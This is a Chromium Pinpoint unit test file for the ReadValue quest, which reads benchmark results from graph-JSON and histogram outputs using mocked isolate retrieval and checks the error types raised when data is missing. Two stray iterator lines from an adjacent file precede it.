return next(self._iter)
next = __next__ # Python 2 compatibility
|
# Copyright 2017 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
from __future__ import print_function
from __future__ import division
from __future__ import absolute_import
import json
import logging
import mock
import sys
import unittest
from dashboard.pinpoint.models.quest import read_value
from tracing.proto import histogram_proto
from tracing.value import histogram_set
from tracing.value import histogram as histogram_module
from tracing.value.diagnostics import generic_set
from tracing.value.diagnostics import reserved_infos
_BASE_ARGUMENTS_HISTOGRAMS = {'benchmark': 'speedometer'}
_BASE_ARGUMENTS_GRAPH_JSON = {
'benchmark': 'base_perftests',
'chart': 'chart_name',
'trace': 'trace_name',
}
class ReadValueQuestTest(unittest.TestCase):
def setUp(self):
# Intercept logging messages so that they show up in the test output when a test fails.
self.logger = logging.getLogger()
self.logger.level = logging.DEBUG
self.stream_handler = logging.StreamHandler(sys.stdout)
self.logger.addHandler(self.stream_handler)
self.addCleanup(self.logger.removeHandler, self.stream_handler)
super(ReadValueQuestTest, self).setUp()
def testMinimumArguments(self):
quest = read_value.ReadValue.FromDict(_BASE_ARGUMENTS_HISTOGRAMS)
expected = read_value.ReadValue(
results_filename='speedometer/perf_results.json')
self.assertEqual(quest, expected)
def testAllArguments(self):
arguments = dict(_BASE_ARGUMENTS_HISTOGRAMS)
arguments['chart'] = 'timeToFirst'
arguments['grouping_label'] = 'pcv1-cold'
arguments['trace'] = 'trace_name'
arguments['statistic'] = 'avg'
quest = read_value.ReadValue.FromDict(arguments)
expected = read_value.ReadValue(
results_filename='speedometer/perf_results.json',
metric='timeToFirst',
grouping_label='pcv1-cold',
trace_or_story='trace_name',
statistic='avg',
chart='timeToFirst')
self.assertEqual(quest, expected)
def testArgumentsWithStoryInsteadOfTrace(self):
arguments = dict(_BASE_ARGUMENTS_HISTOGRAMS)
arguments['chart'] = 'timeToFirst'
arguments['grouping_label'] = 'pcv1-cold'
arguments['story'] = 'trace_name'
arguments['statistic'] = 'avg'
quest = read_value.ReadValue.FromDict(arguments)
expected = read_value.ReadValue(
results_filename='speedometer/perf_results.json',
metric='timeToFirst',
grouping_label='pcv1-cold',
trace_or_story='trace_name',
statistic='avg',
chart='timeToFirst')
self.assertEqual(quest, expected)
def testArgumentsWithNoChart(self):
arguments = dict(_BASE_ARGUMENTS_HISTOGRAMS)
arguments['story'] = 'trace_name'
quest = read_value.ReadValue.FromDict(arguments)
expected = read_value.ReadValue(
results_filename='speedometer/perf_results.json',
metric=None,
grouping_label=None,
trace_or_story='trace_name',
statistic=None)
self.assertEqual(quest, expected)
def testWindows(self):
arguments = dict(_BASE_ARGUMENTS_HISTOGRAMS)
arguments['dimensions'] = [{'key': 'os', 'value': 'Windows-10'}]
quest = read_value.ReadValue.FromDict(arguments)
expected = read_value.ReadValue(
results_filename='speedometer\\perf_results.json')
self.assertEqual(quest, expected)
def testGraphJsonMissingChart(self):
arguments = dict(_BASE_ARGUMENTS_GRAPH_JSON)
del arguments['chart']
quest = read_value.ReadValue.FromDict(arguments)
expected = read_value.ReadValue(
results_filename='base_perftests/perf_results.json',
chart=None,
trace_or_story='trace_name')
self.assertEqual(quest, expected)
def testGraphJsonMissingTrace(self):
arguments = dict(_BASE_ARGUMENTS_GRAPH_JSON)
del arguments['trace']
quest = read_value.ReadValue.FromDict(arguments)
expected = read_value.ReadValue(
results_filename='base_perftests/perf_results.json',
chart='chart_name',
metric='chart_name',
trace_or_story=None)
self.assertEqual(quest, expected)
class _ReadValueExecutionTest(unittest.TestCase):
def setUp(self):
# Intercept logging messages so that they show up in the test output when a test fails.
self.logger = logging.getLogger()
self.logger.level = logging.DEBUG
self.stream_handler = logging.StreamHandler(sys.stdout)
self.logger.addHandler(self.stream_handler)
self.addCleanup(self.logger.removeHandler, self.stream_handler)
patcher = mock.patch('dashboard.services.isolate.Retrieve')
self._retrieve = patcher.start()
self.addCleanup(patcher.stop)
super(_ReadValueExecutionTest, self).setUp()
def SetOutputFileContents(self, contents):
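# isolate.Retrieve is stubbed to be called twice: the first call returns the
# output manifest mapping file names to hashes, the second returns the
# contents of the referenced results file.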
self._retrieve.side_effect = (
'{"files": {"chartjson-output.json": {"h": "output json hash"}}}',
json.dumps(contents),
)
def SetOutputFileContentsProto(self, contents):
self._retrieve.side_effect = (
'{"files": {"chartjson-output.json": {"h": "output json hash"}}}',
contents,
)
def SetOutputFileContentsRaw(self, contents):
self._retrieve.side_effect = (contents,)
def assertReadValueError(self, execution, exception):
self.assertTrue(execution.completed)
self.assertTrue(execution.failed)
self.assertIsInstance(execution.exception['traceback'], str)
self.assertIn(exception, execution.exception['traceback'])
def assertReadValueSuccess(self, execution):
self.assertTrue(execution.completed)
self.assertFalse(execution.failed, 'Exception: %s' % (execution.exception,))
self.assertEqual(execution.result_arguments, {})
def assertRetrievedOutputJson(self):
expected_calls = [
mock.call('server', 'output hash'),
mock.call('server', 'output json hash'),
]
self.assertEqual(self._retrieve.mock_calls, expected_calls)
class ReadGraphJsonValueTest(_ReadValueExecutionTest):
def testReadGraphJsonValue(self):
self.SetOutputFileContents(
{'chart': {
'traces': {
'trace': ['126444.869721', '0.0']
}
}})
quest = read_value.ReadGraphJsonValue('chartjson-output.json', 'chart',
'trace')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
self.assertEqual(execution.result_values, (126444.869721,))
self.assertRetrievedOutputJson()
def testReadGraphJsonValue_PerformanceBrowserTests(self):
contents = {'chart': {'traces': {'trace': ['126444.869721', '0.0']}}}
self._retrieve.side_effect = (
'{"files": {"browser_tests/perf_results.json": {"h": "foo"}}}',
json.dumps(contents),
)
quest = read_value.ReadGraphJsonValue(
'performance_browser_tests/perf_results.json', 'chart', 'trace')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
self.assertEqual(execution.result_values, (126444.869721,))
expected_calls = [
mock.call('server', 'output hash'),
mock.call('server', 'foo'),
]
self.assertEqual(self._retrieve.mock_calls, expected_calls)
def testReadGraphJsonValueWithMissingFile(self):
self._retrieve.return_value = '{"files": {}}'
quest = read_value.ReadGraphJsonValue('base_perftests/perf_results.json',
'metric', 'test')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueError(execution, 'ReadValueNoFile')
def testReadGraphJsonValueWithMissingChart(self):
self.SetOutputFileContents({})
quest = read_value.ReadGraphJsonValue('chartjson-output.json', 'metric',
'test')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueError(execution, 'ReadValueChartNotFound')
def testReadGraphJsonValueWithMissingTrace(self):
self.SetOutputFileContents({'chart': {'traces': {}}})
quest = read_value.ReadGraphJsonValue('chartjson-output.json', 'chart',
'test')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueError(execution, 'ReadValueTraceNotFound')
class ReadValueTest(_ReadValueExecutionTest):
def testReadGraphJsonValue(self):
self.SetOutputFileContents(
{'chart': {
'traces': {
'trace': ['126444.869721', '0.0']
}
}})
quest = read_value.ReadValue(
results_filename='chartjson-output.json',
chart='chart',
trace_or_story='trace')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
self.assertEqual(execution.result_values, (126444.869721,))
self.assertRetrievedOutputJson()
def testReadGraphJsonValueWithMissingFile(self):
self.SetOutputFileContentsRaw('{"files": {}}')
quest = read_value.ReadValue(
results_filename='base_perftests/perf_results.json',
chart='metric',
trace_or_story='test')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueError(execution, 'ReadValueNoFile')
def testReadGraphJsonValueWithMissingTrace(self):
self.SetOutputFileContents({'chart': {'traces': {}}})
quest = read_value.ReadValue(
results_filename='chartjson-output.json',
chart='chart',
trace_or_story='test')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueError(execution, 'ReadValueTraceNotFound')
def testReadHistogramsJsonValue(self):
hist = histogram_module.Histogram('hist', 'count')
hist.AddSample(0)
hist.AddSample(1)
hist.AddSample(2)
histograms = histogram_set.HistogramSet([hist])
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORY_TAGS.name, generic_set.GenericSet(['group:label']))
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORIES.name, generic_set.GenericSet(['story']))
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadValue(
results_filename='chartjson-output.json',
metric=hist.name,
grouping_label='label',
trace_or_story='story')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
self.assertEqual(execution.result_values, (0, 1, 2))
self.assertRetrievedOutputJson()
def testReadHistogramsJsonValueWithMissingFile(self):
self.SetOutputFileContentsRaw('{"files": {}}')
quest = read_value.ReadValue(
results_filename='chartjson-output.json',
metric='metric',
grouping_label='test')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueError(execution, 'ReadValueNoFile')
def testReadHistogramsJsonValueStoryNeedsEscape(self):
hist = histogram_module.Histogram('hist', 'count')
hist.AddSample(0)
hist.AddSample(1)
hist.AddSample(2)
histograms = histogram_set.HistogramSet([hist])
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORY_TAGS.name, generic_set.GenericSet(['group:label']))
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORIES.name, generic_set.GenericSet(['http://story']))
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadValue(
results_filename='chartjson-output.json',
metric=hist.name,
grouping_label='label',
trace_or_story='http://story')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
self.assertEqual(execution.result_values, (0, 1, 2))
self.assertRetrievedOutputJson()
def testReadHistogramsJsonValueHistogramNameNeedsEscape(self):
hist = histogram_module.Histogram('hist:name:has:colons', 'count')
hist.AddSample(0)
hist.AddSample(1)
hist.AddSample(2)
histograms = histogram_set.HistogramSet([hist])
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORY_TAGS.name, generic_set.GenericSet(['group:label']))
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORIES.name,
generic_set.GenericSet(['story:has:colons:too']))
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadValue(
results_filename='chartjson-output.json',
metric=hist.name,
grouping_label='label',
trace_or_story='story:has:colons:too')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
self.assertEqual(execution.result_values, (0, 1, 2))
self.assertRetrievedOutputJson()
def testReadHistogramsJsonValueGroupingLabelOptional(self):
hist = histogram_module.Histogram('hist:name:has:colons', 'count')
hist.AddSample(0)
hist.AddSample(1)
hist.AddSample(2)
histograms = histogram_set.HistogramSet([hist])
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORY_TAGS.name, generic_set.GenericSet(['group:label']))
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORIES.name,
generic_set.GenericSet(['story:has:colons:too']))
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadValue(
results_filename='chartjson-output.json',
metric=hist.name,
trace_or_story='story:has:colons:too')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
self.assertEqual(execution.result_values, (0, 1, 2))
self.assertRetrievedOutputJson()
def testReadHistogramsJsonValueStatistic(self):
hist = histogram_module.Histogram('hist', 'count')
hist.AddSample(0)
hist.AddSample(1)
hist.AddSample(2)
histograms = histogram_set.HistogramSet([hist])
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORY_TAGS.name, generic_set.GenericSet(['group:label']))
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORIES.name, generic_set.GenericSet(['story']))
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadValue(
results_filename='chartjson-output.json',
metric=hist.name,
grouping_label='label',
trace_or_story='story',
statistic='avg')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
self.assertEqual(execution.result_values, (1,))
self.assertRetrievedOutputJson()
def testReadHistogramsJsonValueStatisticNoSamples(self):
hist = histogram_module.Histogram('hist', 'count')
histograms = histogram_set.HistogramSet([hist])
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORY_TAGS.name, generic_set.GenericSet(['group:label']))
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORIES.name, generic_set.GenericSet(['story']))
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadValue(
results_filename='chartjson-output.json',
metric=hist.name,
grouping_label='label',
trace_or_story='story',
statistic='avg')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueError(execution, 'ReadValueNoValues')
def testReadHistogramsJsonValueMultipleHistograms(self):
hist = histogram_module.Histogram('hist', 'count')
hist.AddSample(0)
hist.AddSample(1)
hist.AddSample(2)
hist2 = histogram_module.Histogram('hist', 'count')
hist2.AddSample(0)
hist2.AddSample(1)
hist2.AddSample(2)
hist3 = histogram_module.Histogram('some_other_histogram', 'count')
hist3.AddSample(3)
hist3.AddSample(4)
hist3.AddSample(5)
histograms = histogram_set.HistogramSet([hist, hist2, hist3])
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORY_TAGS.name, generic_set.GenericSet(['group:label']))
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORIES.name, generic_set.GenericSet(['story']))
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadValue(
results_filename='chartjson-output.json',
metric=hist.name,
grouping_label='label',
trace_or_story='story')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
self.assertEqual(execution.result_values, (0, 1, 2, 0, 1, 2))
self.assertRetrievedOutputJson()
def testReadHistogramsTraceUrls(self):
hist = histogram_module.Histogram('hist', 'count')
hist.AddSample(0)
hist.diagnostics[reserved_infos.TRACE_URLS.name] = (
generic_set.GenericSet(['trace_url1', 'trace_url2']))
hist2 = histogram_module.Histogram('hist2', 'count')
hist2.diagnostics[reserved_infos.TRACE_URLS.name] = (
generic_set.GenericSet(['trace_url3']))
hist3 = histogram_module.Histogram('hist3', 'count')
hist3.diagnostics[reserved_infos.TRACE_URLS.name] = (
generic_set.GenericSet(['trace_url2']))
histograms = histogram_set.HistogramSet([hist, hist2, hist3])
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORIES.name, generic_set.GenericSet(['story']))
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadValue(
results_filename='chartjson-output.json', metric=hist.name)
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
self.assertEqual(execution.result_values, (0,))
self.assertEqual(
{
'completed':
True,
'exception':
None,
'details': [
{
'key': 'trace',
'value': 'story',
'url': 'trace_url1',
},
{
'key': 'trace',
'value': 'story',
'url': 'trace_url2',
},
{
'key': 'trace',
'value': 'story',
'url': 'trace_url3',
},
],
}, execution.AsDict())
self.assertRetrievedOutputJson()
def testReadHistogramsDiagnosticRefSkipTraceUrls(self):
hist = histogram_module.Histogram('hist', 'count')
hist.AddSample(0)
hist.diagnostics[reserved_infos.TRACE_URLS.name] = (
generic_set.GenericSet(['trace_url1', 'trace_url2']))
hist2 = histogram_module.Histogram('hist2', 'count')
hist2.diagnostics[reserved_infos.TRACE_URLS.name] = (
generic_set.GenericSet(['trace_url3']))
hist2.diagnostics[reserved_infos.TRACE_URLS.name].guid = 'foo'
histograms = histogram_set.HistogramSet([hist, hist2])
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadValue(
results_filename='chartjson-output.json', metric=hist.name)
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
self.assertEqual(execution.result_values, (0,))
self.assertEqual(
{
'completed':
True,
'exception':
None,
'details': [
{
'key': 'trace',
'value': 'trace_url1',
'url': 'trace_url1',
},
{
'key': 'trace',
'value': 'trace_url2',
'url': 'trace_url2',
},
],
}, execution.AsDict())
self.assertRetrievedOutputJson()
def testReadHistogramsJsonValueWithNoGroupingLabel(self):
hist = histogram_module.Histogram('hist', 'count')
hist.AddSample(0)
hist.AddSample(1)
hist.AddSample(2)
histograms = histogram_set.HistogramSet([hist])
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORY_TAGS.name, generic_set.GenericSet(['group:label']))
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadValue(
results_filename='chartjson-output.json',
metric=hist.name,
grouping_label='label')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
self.assertEqual(execution.result_values, (0, 1, 2))
self.assertRetrievedOutputJson()
def testReadHistogramsJsonValueWithNoStory(self):
hist = histogram_module.Histogram('hist', 'count')
hist.AddSample(0)
hist.AddSample(1)
hist.AddSample(2)
histograms = histogram_set.HistogramSet([hist])
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORIES.name, generic_set.GenericSet(['story']))
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadValue(
results_filename='chartjson-output.json',
metric=hist.name,
trace_or_story='story')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
self.assertEqual(execution.result_values, (0, 1, 2))
self.assertRetrievedOutputJson()
def testReadHistogramsJsonValueSummaryGroupingLabel(self):
samples = []
hists = []
for i in range(10):
hist = histogram_module.Histogram('hist', 'count')
hist.AddSample(0)
hist.AddSample(1)
hist.AddSample(2)
hist.diagnostics[reserved_infos.STORIES.name] = (
generic_set.GenericSet(['story%d' % i]))
hists.append(hist)
samples.extend(hist.sample_values)
histograms = histogram_set.HistogramSet(hists)
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORY_TAGS.name, generic_set.GenericSet(['group:label']))
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadValue(
results_filename='chartjson-output.json',
metric=hists[0].name,
grouping_label='label')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
self.assertEqual(execution.result_values, (sum(samples),))
self.assertRetrievedOutputJson()
def testReadHistogramsJsonValueSummary(self):
samples = []
hists = []
for i in range(10):
hist = histogram_module.Histogram('hist', 'count')
hist.AddSample(0)
hist.AddSample(1)
hist.AddSample(2)
hist.diagnostics[reserved_infos.STORIES.name] = (
generic_set.GenericSet(['story%d' % i]))
hist.diagnostics[reserved_infos.STORY_TAGS.name] = (
generic_set.GenericSet(['group:label1']))
hists.append(hist)
samples.extend(hist.sample_values)
for i in range(10):
hist = histogram_module.Histogram('hist', 'count')
hist.AddSample(0)
hist.AddSample(1)
hist.AddSample(2)
hist.diagnostics[reserved_infos.STORIES.name] = (
generic_set.GenericSet(['another_story%d' % i]))
hist.diagnostics[reserved_infos.STORY_TAGS.name] = (
generic_set.GenericSet(['group:label2']))
hists.append(hist)
samples.extend(hist.sample_values)
histograms = histogram_set.HistogramSet(hists)
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORY_TAGS.name, generic_set.GenericSet(['group:label']))
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadValue(
results_filename='chartjson-output.json', metric=hists[0].name)
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
self.assertEqual(execution.result_values, (sum(samples),))
self.assertRetrievedOutputJson()
def testReadHistogramsJsonValueSummaryNoHistName(self):
samples = []
hists = []
for i in range(10):
hist = histogram_module.Histogram('hist', 'count')
hist.AddSample(0)
hist.AddSample(1)
hist.AddSample(2)
hist.diagnostics[reserved_infos.STORIES.name] = (
generic_set.GenericSet(['story%d' % i]))
hist.diagnostics[reserved_infos.STORY_TAGS.name] = (
generic_set.GenericSet(['group:label1']))
hists.append(hist)
samples.extend(hist.sample_values)
histograms = histogram_set.HistogramSet(hists)
histograms.AddSharedDiagnosticToAllHistograms(
reserved_infos.STORY_TAGS.name, generic_set.GenericSet(['group:label']))
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadValue(results_filename='chartjson-output.json')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
self.assertEqual(execution.result_values, ())
self.assertRetrievedOutputJson()
def testReadHistogramsJsonValueEmptyHistogramSet(self):
self.SetOutputFileContents([])
quest = read_value.ReadValue(
results_filename='chartjson-output.json',
metric='metric',
grouping_label='test')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueError(execution, 'ReadValueNotFound')
def testReadHistogramsJsonValueWithMissingHistogram(self):
hist = histogram_module.Histogram('hist', 'count')
histograms = histogram_set.HistogramSet([hist])
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadValue(
results_filename='chartjson-output.json', metric='does_not_exist')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueError(execution, 'ReadValueNotFound')
def testReadHistogramsJsonValueWithNoValues(self):
hist = histogram_module.Histogram('hist', 'count')
histograms = histogram_set.HistogramSet([hist])
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadValue(
results_filename='chartjson-output.json', metric='chart')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueError(execution, 'ReadValueNotFound')
def testReadHistogramsJsonValueGroupingLabelWithNoValues(self):
hist = histogram_module.Histogram('hist', 'count')
histograms = histogram_set.HistogramSet([hist])
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadValue(
results_filename='chartjson-output.json',
metric='chart',
grouping_label='label')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueError(execution, 'ReadValueNotFound')
def testReadHistogramsJsonValueStoryWithNoValues(self):
hist = histogram_module.Histogram('hist', 'count')
histograms = histogram_set.HistogramSet([hist])
self.SetOutputFileContents(histograms.AsDicts())
quest = read_value.ReadValue(
results_filename='chartjson-output.json',
metric='chart',
trace_or_story='story')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueError(execution, 'ReadValueNotFound')
def testReadHistogramsProtoValue(self):
hist_set = histogram_proto.Pb2().HistogramSet()
hist = hist_set.histograms.add()
hist.name = 'hist'
hist.unit.unit = histogram_proto.Pb2().COUNT
hist.all_bins[0].bin_count = 1
map1 = hist.all_bins[0].diagnostic_maps.add().diagnostic_map
map1['test'].generic_set.values.append('metric')
self.SetOutputFileContentsProto(hist_set.SerializeToString())
quest = read_value.ReadValue(
results_filename='chartjson-output.json',
metric='metric',
grouping_label='test')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueSuccess(execution)
def testReadHistogramsProtoValueEmptyHistogramSet(self):
hist_set = histogram_proto.Pb2().HistogramSet()
self.SetOutputFileContentsProto(hist_set.SerializeToString())
quest = read_value.ReadValue(
results_filename='chartjson-output.json',
metric='metric',
grouping_label='test')
execution = quest.Start(None, 'server', 'output hash')
execution.Poll()
self.assertReadValueError(execution, 'ReadValueNotFound')
def testMetricPropertyReturnsChart(self):
quest = read_value.ReadValue(
results_filename='somefile.json',
chart='somechart',
trace_or_story='trace')
self.assertEqual(quest.metric, 'somechart')
|